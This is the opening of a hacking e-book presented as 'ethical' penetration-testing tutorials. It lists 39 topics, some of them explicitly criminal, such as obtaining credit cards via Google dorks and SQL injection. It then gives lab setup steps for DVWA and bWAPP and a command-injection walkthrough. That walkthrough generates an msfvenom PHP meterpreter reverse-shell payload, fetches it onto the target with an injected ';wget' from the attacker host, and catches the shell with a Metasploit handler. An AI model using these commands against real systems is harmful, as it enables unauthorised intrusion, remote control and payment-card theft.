Some Tutorials in Computer Networking Hacking E-Book

Some Examples Related to Ethical Computer Networking Hacking

By

Dr. Hidaia Mahmood Alassouli

[email protected]

1) Abstract

The objective of this work is to provide some quick tutorials in computer networking hacking.

The work includes the following tutorials:

Tutorial 1: Setting Up Penetrating Tutorial in Linux.

Tutorial 2: Setting Up Penetrating Tutorial in Windows.

Tutorial 3: OS Command Injection:

Tutorial 4: Basic SQL Injection Commands.

Tutorial 5: Manual SQL injection using order by and union select technique.

Tutorial 6: Damping SQL Tables and Columns Using the SQL Injection.

Tutorial 7: Uploading Shell in the Site having LFI.

Tutorial 8: Advanced Way for Uploading Shell

Tutorial 9: Uploading shell Using Sqli Command.

Tutorial 10: Uploading Shell Using SQLmap

Tutorial 11: Post Based SQL Injection

Tutorial 12: Cracking the Hashes

Using

Hashcat.

Tutorial 13: Hacking windows 7 and 8 through

Metasploite

Tutorial 14: Tutorial on Cross Site Scripting

Tutorial 15: Hacking Android Mobile Using Metasploit

Tutorial 16: Man of the middle attack:

Tutorial 17: Using SQLmap for SQL injection

Tutorial 18: Hide Your

Ip

Tutorial 19: Uploading Shell and Payloads Using

SQLmap

Tutorial 20: Using Sql Shell in SQLmap

Tutorial 21: Blind SQL Injection

Tutorial 22: Jack Hridoy SQL Injection Solution

Tutorial 23: Using Hydra to Get the Password

Tutorial 24: Finding the phpmyadmin page using websploit.

Tutorial 25: How to root the server using back connect

Tutorial 25: How to root the server using back connect

Tutorial 26: HTML Injection

Tutorial 27: Tutuorial in manual SQl Injection

Tutorial 28: Venom psh-cmd-exe payload

Tutorial 29: Cross site Request Forgery (CSRF)

Tutorial 30: Disable Victim Computer

Tutorial 31: Exploit any firefox

by

xpi_bootstrapped addon

Tutorial 32: Hack android mobile with metasploit

Tutorial 33: PHP Code Injection to Meterpreter Session

Tutorial 34: Basic google operators

Tutorial 35: Hacking Credit Cards with google

Tutorial 36: Finding Vulnerable Websites in Google

Tutorial 37: Using the httrack to download website

Tutorial 38: Getting the credit cards using sql injection and the SQLi dumper

Tutorial 39: Using burp suite to brute force password

Note: a lot of tutorials taken from the Pentesting with spirit!Youtube web site https://www.youtube.com/channel/UC_bzikURwRp3Vdbl3VL959Q

2) Tutorial 1: Setting Up Penetrating Testing in Linux

Download the files from the following links

The downloaded files are the following:

Unzip all files using the command unzip

Move all extracted folders to the directory /var/www. But rename the folders first

If you get problem in mysql console, reset the root user

sudo /etc/init.d/mysql stop

mysqld_safe --skip-grant-tables &

mysql -uroot

update user set password=PASSWORD("mynewpassword") where User='root';

flush privileges;

quit

sudo /etc/init.d/mysql stop

...

sudo /etc/init.d/mysql start

mysql -u root -p

Check the configuration files of of the labs. Browse the owasp (mutillidae).

# cd owasp

#cd webservices

It is configured

7. Go to dvwa directory

# cd dvwa

# gedit config.inc.php

Change the db_password to be empty

8. Start the services

# service apache2 start

# service mysql start

9. Go to 127.0.0.1/sqli and build the databases

10. Go to 127.0.0.1/dvwa and logon with user admin and password password. Create the databases from setup section

11. Go to 127.0.0.1/bwapp/install.php and logon with user bee and password bug. Create the databases.

3) Tutorial 2: Setting Up Penetrating Testing in Windows

Go to 127.0.0.1/sqli and build the databases

Go to 127.0.0.1/dvwa and logon with user admin and password password. Create the databases from setup section

Go to 127.0.0.1/bwapp/install.php and logon with user bee and password bug. Create the databases.

4) Tutorial 3: OS Command Injection:

Goto link for testing command injection

http://192.168.52.139/vulnerabilities/exec/

Write in the form some commands

; ls

;pwd

Generate payload with msfvenom

Msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.52.135 LPORT=1234 –e php/base64 –f raw >/root/spirit1.php

Modify the generated file apirit1.php to add <?php

?> at the beginning and end of file.

Start the http service using python command

Python –m SimpleHTTPServer 80

Write in the command execution form the following command

;wget http://192.168.52.135/spirit3.php

To exploit it, open the terminal in hacker computer

#msfconsole

Msf> use exploit/multi/handler

Msf> set LHOST 192.168.52.135

Msf> set LPORT 1234

Msf> set payload php/meterpreter/reverse_tcp

Msf> exploit

In the command execution form, run the shell by writing

;php –f spirit3.php